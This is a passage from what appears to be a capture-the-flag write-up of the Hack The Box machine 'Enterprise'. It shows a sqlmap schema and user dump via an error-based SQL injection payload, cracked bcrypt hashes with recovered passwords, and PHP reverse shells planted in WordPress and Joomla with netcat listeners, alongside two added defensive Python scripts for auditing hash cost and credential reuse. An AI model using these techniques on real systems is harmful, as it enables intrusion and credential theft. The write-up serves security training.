Database: joomladb Table: edz2g_schemas [2 columns] +--------------+-------------+ | Column | Type | +--------------+-------------+ | extension_id | int(11) | | version_id | varchar(20) | +--------------+-------------+
Database: joomladb Table: edz2g_update_sites [7 columns] +----------------------+---------------+ | Column | Type | +----------------------+---------------+ | location | text | | name | varchar(100) | | type | varchar(20) | | enabled | int(11) | | extra_query | varchar(1000) | | last_check_timestamp | bigint(20) | | update_site_id | int(11) | +----------------------+---------------+
Database: joomladb Table: edz2g_assets [8 columns] +-----------+------------------+ | Column | Type | +-----------+------------------+ | id | int(10) unsigned | | level | int(10) unsigned | | name | varchar(50) | | lft | int(11) | | parent_id | int(11) | | rgt | int(11) | | rules | varchar(5120) | | title | varchar(100) | +-----------+------------------+
Database: joomladb Table: edz2g_fields [24 columns] +------------------+------------------+ | Column | Type | +------------------+------------------+ | access | int(11) | | id | int(10) unsigned | | label | varchar(255) | | language | char(7) | | name | varchar(255) | | ordering | int(11) | | state | tinyint(1) | | type | varchar(255) | | asset_id | int(10) unsigned | | checked_out | int(11) | | checked_out_time | datetime | | context | varchar(255) | | created_time | datetime | | created_user_id | int(10) unsigned | | default_value | text | | description | text | | fieldparams | text | | group_id | int(10) unsigned | | modified_by | int(10) unsigned | | modified_time | datetime | | note | varchar(255) | | params | text | | required | tinyint(1) | | title | varchar(255) | +------------------+------------------+
Database: joomladb Table: edz2g_banners [34 columns] +-------------------+---------------------+ | Column | Type | +-------------------+---------------------+ | id | int(11) | | language | char(7) | | name | varchar(255) | | ordering | int(11) | | reset | datetime | | state | tinyint(3) | | type | int(11) | | version | int(10) unsigned | | alias | varchar(400) | | catid | int(10) unsigned | | checked_out | int(10) unsigned | | checked_out_time | datetime | | cid | int(11) | | clicks | int(11) | | clickurl | varchar(200) | | created | datetime | | created_by | int(10) unsigned | | created_by_alias | varchar(255) | | custombannercode | varchar(2048) | | description | text | | impmade | int(11) | | imptotal | int(11) | | metakey | text | | metakey_prefix | varchar(400) | | modified | datetime | | modified_by | int(10) unsigned | | own_prefix | tinyint(1) | | params | text | | publish_down | datetime | | publish_up | datetime | | purchase_type | tinyint(4) | | sticky | tinyint(1) unsigned | | track_clicks | tinyint(4) | | track_impressions | tinyint(4) | +-------------------+---------------------+
Database: joomladb Table: edz2g_users [16 columns] +---------------+---------------+ | Column | Type | +---------------+---------------+ | id | int(11) | | name | varchar(400) | | password | varchar(100) | | activation | varchar(100) | | block | tinyint(4) | | email | varchar(100) | | lastResetTime | datetime | | lastvisitDate | datetime | | otep | varchar(1000) | | otpKey | varchar(1000) | | params | text | | registerDate | datetime | | requireReset | tinyint(4) | | resetCount | int(11) | | sendEmail | tinyint(4) | | username | varchar(150) | +---------------+---------------+
Database: joomladb Table: edz2g_ucm_history [10 columns] +-----------------+------------------+ | Column | Type | +-----------------+------------------+ | character_count | int(10) unsigned | | editor_user_id | int(10) unsigned | | keep_forever | tinyint(4) | | save_date | datetime | | sha1_hash | varchar(50) | | ucm_item_id | int(10) unsigned | | ucm_type_id | int(10) unsigned | | version_data | mediumtext | | version_id | int(10) unsigned | | version_note | varchar(255) | +-----------------+------------------+
Database: joomladb Table: edz2g_menu_types [6 columns] +-------------+------------------+ | Column | Type | +-------------+------------------+ | id | int(10) unsigned | | asset_id | int(10) unsigned | | client_id | int(11) | | description | varchar(255) | | menutype | varchar(24) | | title | varchar(48) | +-------------+------------------+
Database: joomladb Table: edz2g_content_rating [4 columns] +--------------+------------------+ | Column | Type | +--------------+------------------+ | content_id | int(11) | | lastip | varchar(50) | | rating_count | int(10) unsigned | | rating_sum | int(10) unsigned | +--------------+------------------+
Database: joomladb Table: edz2g_finder_filters [14 columns] +------------------+------------------+ | Column | Type | +------------------+------------------+ | data | text | | state | tinyint(1) | | alias | varchar(255) | | checked_out | int(10) unsigned | | checked_out_time | datetime | | created | datetime | | created_by | int(10) unsigned | | created_by_alias | varchar(255) | | filter_id | int(10) unsigned | | map_count | int(10) unsigned | | modified | datetime | | modified_by | int(10) unsigned | | params | mediumtext | | title | varchar(255) | +------------------+------------------+
Database: joomladb Table: edz2g_messages [9 columns] +--------------+---------------------+ | Column | Type | +--------------+---------------------+ | state | tinyint(1) | | date_time | datetime | | folder_id | tinyint(3) unsigned | | message | text | | message_id | int(10) unsigned | | priority | tinyint(1) unsigned | | subject | varchar(255) | | user_id_from | int(10) unsigned | | user_id_to | int(10) unsigned | +--------------+---------------------+
Database: joomladb Table: edz2g_finder_taxonomy [6 columns] +-----------+---------------------+ | Column | Type | +-----------+---------------------+ | access | tinyint(1) unsigned | | id | int(10) unsigned | | ordering | tinyint(1) unsigned | | state | tinyint(1) unsigned | | parent_id | int(10) unsigned | | title | varchar(255) | +-----------+---------------------+
Database: joomladb Table: edz2g_user_keys [7 columns] +----------+------------------+ | Column | Type | +----------+------------------+ | id | int(10) unsigned | | time | varchar(200) | | token | varchar(255) | | invalid | tinyint(4) | | series | varchar(191) | | uastring | varchar(255) | | user_id | varchar(150) | +----------+------------------+
Database: joomladb Table: edz2g_contact_details [43 columns] +------------------+---------------------+ | Column | Type | +------------------+---------------------+ | access | int(10) unsigned | | id | int(11) | | language | varchar(7) | | name | varchar(255) | | ordering | int(11) | | state | varchar(100) | | version | int(10) unsigned | | address | text | | alias | varchar(400) | | catid | int(11) | | checked_out | int(10) unsigned | | checked_out_time | datetime | | con_position | varchar(255) | | country | varchar(100) | | created | datetime | | created_by | int(10) unsigned | | created_by_alias | varchar(255) | | default_con | tinyint(1) unsigned | | email_to | varchar(255) | | fax | varchar(255) | | featured | tinyint(3) unsigned | | hits | int(10) unsigned | | image | varchar(255) | | metadata | text | | metadesc | text | | metakey | text | | misc | mediumtext | | mobile | varchar(255) | | modified | datetime | | modified_by | int(10) unsigned | | params | text | | postcode | varchar(100) | | publish_down | datetime | | publish_up | datetime | | published | tinyint(1) | | sortname1 | varchar(255) | | sortname2 | varchar(255) | | sortname3 | varchar(255) | | suburb | varchar(100) | | telephone | varchar(255) | | user_id | int(11) | | webpage | varchar(255) | | xreference | varchar(50) | +------------------+---------------------+
Database: joomladb Table: edz2g_fields_values [3 columns] +----------+------------------+ | Column | Type | +----------+------------------+ | value | text | | field_id | int(10) unsigned | | item_id | varchar(255) | +----------+------------------+
Database: joomladb Table: edz2g_finder_links_termsa [3 columns] +---------+------------------+ | Column | Type | +---------+------------------+ | link_id | int(10) unsigned | | term_id | int(10) unsigned | | weight | float unsigned | +---------+------------------+
Database: joomladb Table: edz2g_finder_links_termsb [3 columns] +---------+------------------+ | Column | Type | +---------+------------------+ | link_id | int(10) unsigned | | term_id | int(10) unsigned | | weight | float unsigned | +---------+------------------+
Database: joomladb Table: edz2g_modules [18 columns] +------------------+---------------------+ | Column | Type | +------------------+---------------------+ | access | int(10) unsigned | | content | text | | id | int(11) | | language | char(7) | | module | varchar(50) | | ordering | int(11) | | position | varchar(50) | | asset_id | int(10) unsigned | | checked_out | int(10) unsigned | | checked_out_time | datetime | | client_id | tinyint(4) | | note | varchar(255) | | params | text | | publish_down | datetime | | publish_up | datetime | | published | tinyint(1) | | showtitle | tinyint(3) unsigned | | title | varchar(100) | +------------------+---------------------+
Database: joomladb Table: edz2g_overrider [4 columns] +----------+--------------+ | Column | Type | +----------+--------------+ | file | varchar(255) | | id | int(10) | | constant | varchar(255) | | string | text | +----------+--------------+
Database: joomladb Table: edz2g_updates [14 columns] +----------------+---------------+ | Column | Type | +----------------+---------------+ | data | text | | element | varchar(100) | | name | varchar(100) | | type | varchar(20) | | version | varchar(32) | | client_id | tinyint(3) | | description | text | | detailsurl | text | | extension_id | int(11) | | extra_query | varchar(1000) | | folder | varchar(20) | | infourl | text | | update_id | int(11) | | update_site_id | int(11) | +----------------+---------------+
Database: joomladb Table: edz2g_user_notes [15 columns] +------------------+------------------+ | Column | Type | +------------------+------------------+ | id | int(10) unsigned | | state | tinyint(3) | | body | text | | catid | int(10) unsigned | | checked_out | int(10) unsigned | | checked_out_time | datetime | | created_time | datetime | | created_user_id | int(10) unsigned | | modified_time | datetime | | modified_user_id | int(10) unsigned | | publish_down | datetime | | publish_up | datetime | | review_time | datetime | | subject | varchar(100) | | user_id | int(10) unsigned | +------------------+------------------+
Database: joomladb Table: edz2g_finder_links_terms0 [3 columns] +---------+------------------+ | Column | Type | +---------+------------------+ | link_id | int(10) unsigned | | term_id | int(10) unsigned | | weight | float unsigned | +---------+------------------+
Database: joomladb Table: edz2g_finder_links_terms9 [3 columns] +---------+------------------+ | Column | Type | +---------+------------------+ | link_id | int(10) unsigned | | term_id | int(10) unsigned | | weight | float unsigned | +---------+------------------+
Database: joomladb Table: edz2g_user_profiles [4 columns] +---------------+--------------+ | Column | Type | +---------------+--------------+ | ordering | int(11) | | profile_key | varchar(100) | | profile_value | text | | user_id | int(11) | +---------------+--------------+
Database: joomladb Table: edz2g_menu [24 columns] +-------------------+---------------------+ | Column | Type | +-------------------+---------------------+ | access | int(10) unsigned | | id | int(11) | | language | char(7) | | level | int(10) unsigned | | link | varchar(1024) | | path | varchar(1024) | | type | varchar(16) | | alias | varchar(400) | | browserNav | tinyint(4) | | checked_out | int(10) unsigned | | checked_out_time | datetime | | client_id | tinyint(4) | | component_id | int(10) unsigned | | home | tinyint(3) unsigned | | img | varchar(255) | | lft | int(11) | | menutype | varchar(24) | | note | varchar(255) | | params | text | | parent_id | int(10) unsigned | | published | tinyint(4) | | rgt | int(11) | | template_style_id | int(10) unsigned | | title | varchar(255) | +-------------------+---------------------+
Database: joomladb Table: edz2g_languages [14 columns] +--------------+------------------+ | Column | Type | +--------------+------------------+ | access | int(10) unsigned | | ordering | int(11) | | asset_id | int(10) unsigned | | description | varchar(512) | | image | varchar(50) | | lang_code | char(7) | | lang_id | int(11) unsigned | | metadesc | text | | metakey | text | | published | int(11) | | sef | varchar(50) | | sitename | varchar(1024) | | title | varchar(50) | | title_native | varchar(50) | +--------------+------------------+
Database: joomladb Table: edz2g_content_frontpage [2 columns] +------------+---------+ | Column | Type | +------------+---------+ | ordering | int(11) | | content_id | int(11) | +------------+---------+
Database: joomladb Table: edz2g_banner_tracks [4 columns] +------------+------------------+ | Column | Type | +------------+------------------+ | count | int(10) unsigned | | banner_id | int(10) unsigned | | track_date | datetime | | track_type | int(10) unsigned | +------------+------------------+
Database: joomladb Table: edz2g_viewlevels [4 columns] +----------+------------------+ | Column | Type | +----------+------------------+ | id | int(10) unsigned | | ordering | int(11) | | rules | varchar(5120) | | title | varchar(100) | +----------+------------------+
Database: joomladb Table: edz2g_associations [3 columns] +---------+-------------+ | Column | Type | +---------+-------------+ | id | int(11) | | key | char(32) | | context | varchar(50) | +---------+-------------+
Database: joomladb Table: edz2g_utf8_conversion [1 column] +-----------+------------+ | Column | Type | +-----------+------------+ | converted | tinyint(4) | +-----------+------------+
Database: joomladb Table: edz2g_finder_taxonomy_map [2 columns] +---------+------------------+ | Column | Type | +---------+------------------+ | link_id | int(10) unsigned | | node_id | int(10) unsigned | +---------+------------------+
Database: joomladb Table: edz2g_ucm_content [32 columns] +--------------------------+---------------------+ | Column | Type | +--------------------------+---------------------+ | asset_id | int(10) unsigned | | core_access | int(10) unsigned | | core_alias | varchar(400) | | core_body | mediumtext | | core_catid | int(10) unsigned | | core_checked_out_time | varchar(255) | | core_checked_out_user_id | int(10) unsigned | | core_content_id | int(10) unsigned | | core_content_item_id | int(10) unsigned | | core_created_by_alias | varchar(255) | | core_created_time | datetime | | core_created_user_id | int(10) unsigned | | core_featured | tinyint(4) unsigned | | core_hits | int(10) unsigned | | core_images | text | | core_language | char(7) | | core_metadata | varchar(2048) | | core_metadesc | text | | core_metakey | text | | core_modified_time | datetime | | core_modified_user_id | int(10) unsigned | | core_ordering | int(11) | | core_params | text | | core_publish_down | datetime | | core_publish_up | datetime | | core_state | tinyint(1) | | core_title | varchar(400) | | core_type_alias | varchar(400) | | core_type_id | int(10) unsigned | | core_urls | text | | core_version | int(10) unsigned | | core_xreference | varchar(50) | +--------------------------+---------------------+
Database: joomladb Table: edz2g_ucm_base [4 columns] +-----------------+------------------+ | Column | Type | +-----------------+------------------+ | ucm_id | int(10) unsigned | | ucm_item_id | int(10) | | ucm_language_id | int(11) | | ucm_type_id | int(11) | +-----------------+------------------+
Database: joomladb Table: edz2g_user_usergroup_map [2 columns] +----------+------------------+ | Column | Type | +----------+------------------+ | group_id | int(10) unsigned | | user_id | int(10) unsigned | +----------+------------------+
Database: joomladb Table: edz2g_categories [27 columns] +------------------+------------------+ | Column | Type | +------------------+------------------+ | access | int(10) unsigned | | extension | varchar(50) | | id | int(11) | | language | char(7) | | level | int(10) unsigned | | path | varchar(400) | | version | int(10) unsigned | | alias | varchar(400) | | asset_id | int(10) unsigned | | checked_out | int(11) unsigned | | checked_out_time | datetime | | created_time | datetime | | created_user_id | int(10) unsigned | | description | mediumtext | | hits | int(10) unsigned | | lft | int(11) | | metadata | varchar(2048) | | metadesc | varchar(1024) | | metakey | varchar(1024) | | modified_time | datetime | | modified_user_id | int(10) unsigned | | note | varchar(255) | | params | text | | parent_id | int(10) unsigned | | published | tinyint(1) | | rgt | int(11) | | title | varchar(255) | +------------------+------------------+
Database: joomladb Table: edz2g_finder_links_terms7 [3 columns] +---------+------------------+ | Column | Type | +---------+------------------+ | link_id | int(10) unsigned | | term_id | int(10) unsigned | | weight | float unsigned | +---------+------------------+
Database: joomladb Table: edz2g_finder_links_termsd [3 columns] +---------+------------------+ | Column | Type | +---------+------------------+ | link_id | int(10) unsigned | | term_id | int(10) unsigned | | weight | float unsigned | +---------+------------------+
Database: joomladb Table: edz2g_contentitem_tag_map [6 columns] +-----------------+------------------+ | Column | Type | +-----------------+------------------+ | content_item_id | int(11) | | core_content_id | int(10) unsigned | | tag_date | timestamp | | tag_id | int(10) unsigned | | type_alias | varchar(255) | | type_id | mediumint(8) | +-----------------+------------------+
Database: joomladb
Table: edz2g_template_styles
[6 columns]
+-----------+---------------------+
| Column    | Type                |
+-----------+---------------------+
| id        | int(10) unsigned    |
| template  | varchar(50)         |
| client_id | tinyint(1) unsigned |
| home      | char(7)             |
| params    | text                |
| title     | varchar(255)        |
+-----------+---------------------+

Database: joomladb
Table: edz2g_finder_links_terms2
[3 columns]
+---------+------------------+
| Column  | Type             |
+---------+------------------+
| link_id | int(10) unsigned |
| term_id | int(10) unsigned |
| weight  | float unsigned   |
+---------+------------------+

Database: joomladb
Table: edz2g_finder_links_terms8
[3 columns]
+---------+------------------+
| Column  | Type             |
+---------+------------------+
| link_id | int(10) unsigned |
| term_id | int(10) unsigned |
| weight  | float unsigned   |
+---------+------------------+

Database: joomladb
Table: edz2g_finder_links_terms1
[3 columns]
+---------+------------------+
| Column  | Type             |
+---------+------------------+
| link_id | int(10) unsigned |
| term_id | int(10) unsigned |
| weight  | float unsigned   |
+---------+------------------+

Database: joomladb
Table: edz2g_finder_links_terms3
[3 columns]
+---------+------------------+
| Column  | Type             |
+---------+------------------+
| link_id | int(10) unsigned |
| term_id | int(10) unsigned |
| weight  | float unsigned   |
+---------+------------------+

Database: joomladb
Table: edz2g_modules_menu
[2 columns]
+----------+---------+
| Column   | Type    |
+----------+---------+
| menuid   | int(11) |
| moduleid | int(11) |
+----------+---------+

Database: joomladb
Table: edz2g_finder_links_termsf
[3 columns]
+---------+------------------+
| Column  | Type             |
+---------+------------------+
| link_id | int(10) unsigned |
| term_id | int(10) unsigned |
| weight  | float unsigned   |
+---------+------------------+

Database: joomladb
Table: edz2g_usergroups
[5 columns]
+-----------+------------------+
| Column    | Type             |
+-----------+------------------+
| id        | int(10) unsigned |
| lft       | int(11)          |
| parent_id | int(10) unsigned |
| rgt       | int(11)          |
| title     | varchar(100)     |
+-----------+------------------+

Database: joomladb
Table: edz2g_session
[7 columns]
+------------+---------------------+
| Column     | Type                |
+------------+---------------------+
| data       | mediumtext          |
| time       | varchar(14)         |
| client_id  | tinyint(3) unsigned |
| guest      | tinyint(4) unsigned |
| session_id | varchar(191)        |
| userid     | int(11)             |
| username   | varchar(150)        |
+------------+---------------------+

Database: joomladb
Table: edz2g_finder_terms_common
[2 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| language | varchar(3)  |
| term     | varchar(75) |
+----------+-------------+

Database: joomladb
Table: edz2g_update_sites_extensions
[2 columns]
+----------------+---------+
| Column         | Type    |
+----------------+---------+
| extension_id   | int(11) |
| update_site_id | int(11) |
+----------------+---------+

Database: joomladb
Table: edz2g_finder_links_termsc
[3 columns]
+---------+------------------+
| Column  | Type             |
+---------+------------------+
| link_id | int(10) unsigned |
| term_id | int(10) unsigned |
| weight  | float unsigned   |
+---------+------------------+
[13:26:50] [INFO] fetched data logged to text files under '/home/u505/.sqlmap/output/enterprise.htb'
[*] ending @ 13:26:50 /2020-05-25/
Joomla Users
u505@kali:~/HTB/Machines/Enterprise$ sqlmap -r lcars_db.req --dump -D joomladb -T edz2g_users -C id,email,username,password
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.4.5#stable}
|_ -| . [)]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 14:30:07 /2020-05-25/
[14:30:07] [INFO] parsing HTTP request from 'lcars_db.req'
[14:30:07] [INFO] resuming back-end DBMS 'mysql'
[14:30:07] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: query (GET)
    Type: error-based
    Title: MySQL >= 5.0 error-based - Parameter replace (FLOOR)
    Payload: query=(SELECT 3596 FROM(SELECT COUNT(*),CONCAT(0x716a767171,(SELECT (ELT(3596=3596,1))),0x71767a7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
---
[14:30:09] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0
[14:30:09] [INFO] fetching entries of column(s) '`id`, `password`, email, username' for table 'edz2g_users' in database 'joomladb'
[14:30:09] [INFO] resumed: '400'
[14:30:09] [INFO] resumed: '$2y$10$cXSgEkNQGBBUneDKXq9gU.8RAf37GyN7JIrPE7us9UBMR9uDDKaWy'
[14:30:09] [INFO] resumed: 'geordi.la.forge@enterprise.htb'
[14:30:09] [INFO] resumed: 'geordi.la.forge'
[14:30:09] [INFO] resumed: '401'
[14:30:09] [INFO] resumed: '$2y$10$90gyQVv7oL6CCN8lF/0LYulrjKRExceg2i0147/Ewpb6tBzHaqL2q'
[14:30:09] [INFO] resumed: 'guinan@enterprise.htb'
[14:30:09] [INFO] resumed: 'Guinan'
Database: joomladb
Table: edz2g_users
[2 entries]
+------+--------------------------------------------------------------+--------------------------------+-----------------+
| id   | password                                                     | email                          | username        |
+------+--------------------------------------------------------------+--------------------------------+-----------------+
| 400  | $2y$10$cXSgEkNQGBBUneDKXq9gU.8RAf37GyN7JIrPE7us9UBMR9uDDKaWy | geordi.la.forge@enterprise.htb | geordi.la.forge |
| 401  | $2y$10$90gyQVv7oL6CCN8lF/0LYulrjKRExceg2i0147/Ewpb6tBzHaqL2q | guinan@enterprise.htb          | Guinan          |
+------+--------------------------------------------------------------+--------------------------------+-----------------+

[14:30:09] [INFO] table 'joomladb.edz2g_users' dumped to CSV file '/home/u505/.sqlmap/output/enterprise.htb/dump/joomladb/edz2g_users.csv'
[14:30:09] [INFO] fetched data logged to text files under '/home/u505/.sqlmap/output/enterprise.htb'
[*] ending @ 14:30:09 /2020-05-25/
We brute-force the users' password hashes.
u505@kali:~/HTB/Machines/Enterprise$ cat joomla.hash
geordi.la.forge:$2y$10$cXSgEkNQGBBUneDKXq9gU.8RAf37GyN7JIrPE7us9UBMR9uDDKaWy
Guinan:$2y$10$90gyQVv7oL6CCN8lF/0LYulrjKRExceg2i0147/Ewpb6tBzHaqL2q
u505@kali:~/HTB/Machines/Enterprise$ hashid '$2y$10$cXSgEkNQGBBUneDKXq9gU.8RAf37GyN7JIrPE7us9UBMR9uDDKaWy'
Analyzing '$2y$10$cXSgEkNQGBBUneDKXq9gU.8RAf37GyN7JIrPE7us9UBMR9uDDKaWy'
[+] Blowfish(OpenBSD)
[+] Woltlab Burning Board 4.x
[+] bcrypt
u505@kali:~/HTB/Machines/Enterprise$ hashcat -m 3200 --username joomla.hash pass.txt
...
u505@kali:~/HTB/Machines/Enterprise$ hashcat -m 3200 --username joomla.hash pass.txt --show
geordi.la.forge:$2y$10$cXSgEkNQGBBUneDKXq9gU.8RAf37GyN7JIrPE7us9UBMR9uDDKaWy:ZD3YxfnSjezg67JZ
Guinan:$2y$10$90gyQVv7oL6CCN8lF/0LYulrjKRExceg2i0147/Ewpb6tBzHaqL2q:ZxJyhGem4k338S2Y
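hashid only tells us the family; what made these hashes cheap to crack from a wordlist is the work factor encoded in them. The following is an added example (not from the write-up) that parses the two bcrypt strings dumped above into identifier, cost, salt and digest and audits the cost against a policy threshold; the threshold of 12 is an assumption chosen for illustration.

```python
"""Parse bcrypt modular-crypt strings and audit their work factor.
Added example; the two hashes are the ones dumped from edz2g_users above,
the MIN_COST policy value is an assumption for this example."""
import re

# Constructed input: (username, hash) pairs as written to joomla.hash.
DUMPED_HASHES = [
    ("geordi.la.forge", "$2y$10$cXSgEkNQGBBUneDKXq9gU.8RAf37GyN7JIrPE7us9UBMR9uDDKaWy"),
    ("Guinan", "$2y$10$90gyQVv7oL6CCN8lF/0LYulrjKRExceg2i0147/Ewpb6tBzHaqL2q"),
]

# $<ident>$<cost>$<22-char salt><31-char digest>, salt and digest in bcrypt's
# own base64 alphabet (./A-Za-z0-9).
BCRYPT_RE = re.compile(
    r"^\$(2[abxy]?)\$(\d{2})\$([./A-Za-z0-9]{22})([./A-Za-z0-9]{31})$"
)

MIN_COST = 12  # assumed policy: anything below this is flagged as weak


def parse_bcrypt(h):
    """Split a bcrypt string into its fields; raise on anything else."""
    m = BCRYPT_RE.match(h)
    if not m:
        raise ValueError("not a bcrypt modular-crypt string: %r" % h)
    ident, cost, salt, digest = m.groups()
    cost = int(cost)
    return {
        "ident": ident,
        "cost": cost,
        "rounds": 2 ** cost,   # bcrypt runs 2^cost expensive key-setup iterations
        "salt": salt,
        "digest": digest,
    }


def audit_hashes(entries, min_cost=MIN_COST):
    """Return [(user, cost, weak)] where weak means the cost is below policy."""
    report = []
    for user, h in entries:
        info = parse_bcrypt(h)
        report.append((user, info["cost"], info["cost"] < min_cost))
    return report


if __name__ == "__main__":
    for user, cost, weak in audit_hashes(DUMPED_HASHES):
        print("%-16s cost=%d (2^%d rounds) %s" % (user, cost, cost, "WEAK" if weak else "ok"))
```

Both dumped hashes carry cost 10 (1024 key-setup rounds), which is the Joomla default; a wordlist attack at that cost is slow per candidate but still feasible, as the hashcat result shows.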
WordPress reverse shell
We place our reverse shell in the theme's 404.php page.
u505@kali:~/HTB/Machines/Enterprise$ cp /usr/share/webshells/php/php-reverse-shell.php ./
u505@kali:~/HTB/Machines/Enterprise$ grep CHANGE php-reverse-shell.php
$ip = '10.10.14.16';  // CHANGE THIS
$port = 4444;       // CHANGE THIS
Open a listener.
u505@kali:~/HTB/Machines/Enterprise$ rlwrap nc -lnvp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Requesting a page that does not exist makes WordPress render 404.php.
u505@kali:~/HTB/Machines/Enterprise$ curl http://enterprise.htb/?p=505
And the reverse shell connects back.
u505@kali:~/HTB/Machines/Enterprise$ rlwrap nc -lnvp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.10.61.
Ncat: Connection from 10.10.10.61:37296.
Linux b8319d86d21e 4.10.0-37-generic #41-Ubuntu SMP Fri Oct 6 20:20:37 UTC 2017 x86_64 GNU/Linux
 19:22:37 up  4:47,  0 users,  load average: 0.08, 0.02, 0.01
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python -c "import pty;pty.spawn('/bin/bash')"
/bin/sh: 1: python: not found
$ python3 -c "import pty;pty.spawn('/bin/bash')"
/bin/sh: 2: python3: not found
$ /bin/bash -i
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
Looking for the user flag...
www-data@b8319d86d21e:/home$ cat user.txt
cat user.txt
As you take a look around at your surroundings you realise there is something wrong. This is not the Enterprise! As you try to interact with a console it dawns on you. Your in the Holodeck!
We are inside a Linux container.
www-data@b8319d86d21e:/var/www/html$ grep DB wp-config.php
grep DB wp-config.php
define('DB_NAME', 'wordpress');
define('DB_USER', 'root');
define('DB_PASSWORD', 'NCC-1701E');
define('DB_HOST', 'mysql');
define('DB_CHARSET', 'utf8');
define('DB_COLLATE', );
The database host seems to be another container.
www-data@b8319d86d21e:/var$ cat /etc/hosts
cat /etc/hosts
127.0.0.1 localhost
::1 localhost ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
172.17.0.2 mysql 15af95635b7d
172.17.0.4 b8319d86d21e
We also find an interesting PHP file.
www-data@b8319d86d21e:/var/www/html$ head sqlShell.php
head sqlShell.php
<?php
//Me mashing my keyboard, aka uncrackable password.
//Don't want to accidentally leave this lying around unsecure.
$password = 'NCC-1701E';
session_start();
if ( isset( $_POST['clear'] ) AND $_POST['clear'] == 'clear' ) {
    clear_history();
This PHP page lets us query the database.
We have already queried the database with sqlmap, but this way may be more convenient.
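The same password protects the database in wp-config.php and the query page in sqlShell.php, which is the kind of reuse a code review or a pre-deployment scan should catch. As an added example (not part of the write-up), the script below extracts hard-coded credential literals from PHP sources and reports any value that appears in more than one file; the two file bodies are constructed from the fragments shown above, and the regular expressions are an assumption covering only the two spellings seen here.

```python
"""Find hard-coded credential literals in PHP sources and report values that
are reused across files.  Added example; the file contents are constructed
from the wp-config.php and sqlShell.php fragments shown above."""
import re

# Constructed sample files (subsets of what the shell output shows).
FILES = {
    "wp-config.php": """<?php
define('DB_NAME', 'wordpress');
define('DB_USER', 'root');
define('DB_PASSWORD', 'NCC-1701E');
define('DB_HOST', 'mysql');
""",
    "sqlShell.php": """<?php
//Me mashing my keyboard, aka uncrackable password.
$password = 'NCC-1701E';
session_start();
""",
}

# Two shapes seen on this box (assumed to be the interesting ones):
#   define('XXX_PASSWORD', 'value');   WordPress-style constant
#   $password = 'value';               plain variable assignment
PATTERNS = [
    re.compile(r"define\(\s*['\"](\w*PASS\w*)['\"]\s*,\s*['\"]([^'\"]*)['\"]\s*\)"),
    re.compile(r"\$(\w*pass\w*)\s*=\s*['\"]([^'\"]*)['\"]", re.IGNORECASE),
]


def find_secrets(sources):
    """Return {filename: [(name, value), ...]} for every credential literal found."""
    found = {}
    for fname, text in sources.items():
        hits = []
        for pat in PATTERNS:
            hits.extend(pat.findall(text))
        found[fname] = hits
    return found


def reused_values(found):
    """Map each secret value to the files it occurs in, keeping only values
    that appear in more than one file (empty values are ignored)."""
    where = {}
    for fname, hits in found.items():
        for _name, value in hits:
            if value:
                where.setdefault(value, set()).add(fname)
    return {v: files for v, files in where.items() if len(files) > 1}


if __name__ == "__main__":
    secrets = find_secrets(FILES)
    for fname, hits in secrets.items():
        for name, value in hits:
            print("%-14s %s = %r" % (fname, name, value))
    for value, files in reused_values(secrets).items():
        print("REUSED %r in %s" % (value, ", ".join(sorted(files))))
```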
Joomla reverse shell
Turn on the listener.
u505@kali:~/HTB/Machines/Enterprise$ rlwrap nc -lnvp 4445
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4445
Ncat: Listening on 0.0.0.0:4445
u505@kali:~/HTB/Machines/Enterprise$ rlwrap nc -lnvp 4445
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4445
Ncat: Listening on 0.0.0.0:4445
Ncat: Connection from 10.10.10.61.
Ncat: Connection from 10.10.10.61:46530.
Linux a7018bfdc454 4.10.0-37-generic #41-Ubuntu SMP Fri Oct 6 20:20:37 UTC 2017 x86_64 GNU/Linux
 19:56:22 up  5:21,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ bash -i
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
Again, we are inside a Linux container.
www-data@a7018bfdc454:/var/www/html$ mount -l
mount -l
none on / type aufs (rw,relatime,si=dd348e9525d0350e,dio,dirperm1)
proc on /proc type proc (rw,nosuid,nodev,noexec,relatime)
tmpfs on /dev type tmpfs (rw,nosuid,size=65536k,mode=755)
devpts on /dev/pts type devpts (rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=666)
sysfs on /sys type sysfs (ro,nosuid,nodev,noexec,relatime)
tmpfs on /sys/fs/cgroup type tmpfs (ro,nosuid,nodev,noexec,relatime,mode=755)
cgroup on /sys/fs/cgroup/systemd type cgroup (ro,nosuid,nodev,noexec,relatime,xattr,release_agent=/lib/systemd/systemd-cgroups-agent,name=systemd)
cgroup on /sys/fs/cgroup/blkio type cgroup (ro,nosuid,nodev,noexec,relatime,blkio)
cgroup on /sys/fs/cgroup/net_cls,net_prio type cgroup (ro,nosuid,nodev,noexec,relatime,net_cls,net_prio)
cgroup on /sys/fs/cgroup/pids type cgroup (ro,nosuid,nodev,noexec,relatime,pids)
